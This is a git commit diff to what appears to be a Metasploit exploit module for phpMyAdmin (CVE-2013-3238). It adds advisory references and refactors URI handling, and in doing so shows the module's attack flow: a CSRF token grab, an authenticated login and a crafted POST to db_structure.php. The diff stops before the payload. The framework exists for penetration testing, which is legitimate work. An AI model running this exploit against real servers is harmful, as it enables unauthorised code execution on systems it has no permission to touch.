Add refs and use targeturi

unstable
Meatballs 2013-04-27 10:35:49 +01:00
parent 3ac041386b
commit 209188bc22
1 changed files with 8 additions and 9 deletions


@ -32,6 +32,8 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2013-3238' ],
[ 'PMASA', '2013-2'],
[ 'waraxe', '2013-SA#103' ],
[ 'EDB', '25003'],
[ 'OSVDB', '92793'],
[ 'URL', 'http://www.waraxe.us/advisory-103.html' ],
[ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2013-2.php' ]
],
@ -54,19 +56,15 @@ class Metasploit3 < Msf::Exploit::Remote
register_options(
[
OptString.new('URI', [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']),
OptString.new('TARGETURI', [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
OptString.new('PASSWORD', [ false, "Password to authenticate with", ''])
], self.class)
end
def uri(path="")
normalize_uri(datastore['PATH'], datastore['URI'], path)
end
def check
begin
res = send_request_cgi({ 'uri' => uri('/js/messages.php') })
res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/js/messages.php') })
rescue
print_error("Unable to connect to server.")
return CheckCode::Unknown
@ -115,6 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
uri = target_uri.path
print_status("Grabbing CSRF token...")
response = send_request_cgi({ 'uri' => uri})
if response.nil?
@ -138,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
login = send_request_cgi({
'method' => 'POST',
'uri' => uri('index.php'),
'uri' => normalize_uri(uri, 'index.php'),
'vars_post' => post
})
@ -151,7 +150,7 @@ class Metasploit3 < Msf::Exploit::Remote
cookies = login.get_cookies
login_check = send_request_cgi({
'uri' => uri('index.php'),
'uri' => normalize_uri(uri, 'index.php'),
'vars_get' => { 'token' => token },
'cookie' => cookies
})
@ -164,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote
db = rand_text_alpha(3+rand(3))
exploit_result = send_request_cgi({
'uri' => uri('db_structure.php'),
'uri' => normalize_uri(uri, 'db_structure.php'),
'method' => 'POST',
'cookie' => cookies,
'vars_post' => {